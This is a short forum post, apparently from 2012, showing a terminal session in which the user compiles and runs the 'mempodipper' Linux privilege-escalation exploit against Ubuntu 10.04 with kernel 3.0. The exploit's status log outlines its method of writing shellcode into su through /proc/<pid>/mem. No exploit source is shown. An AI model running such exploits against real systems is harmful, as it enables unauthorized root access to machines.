( bri | 2012. 01. 23., h – 20:50 )

bri:~$ gcc mempodipper.c -o mempodipper

bri:~$ who am i
bri      pts/1        2012-01-23 20:43 (:0.0)

bri:~$ ./mempodipper 
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/2214/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x8049ae0.
[+] Calculating su padding.
[+] Seeking to offset 0x8049ad4.
[+] Executing su with shellcode.

bri:~$ who am i
bri      pts/1        2012-01-23 20:43 (:0.0)

bri:~$ uname -sr
Linux 3.0.0-15-generic

bri:~$ cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=10.04
DISTRIB_CODENAME=lucid
DISTRIB_DESCRIPTION="Ubuntu 10.04.3 LTS"

durva, mi?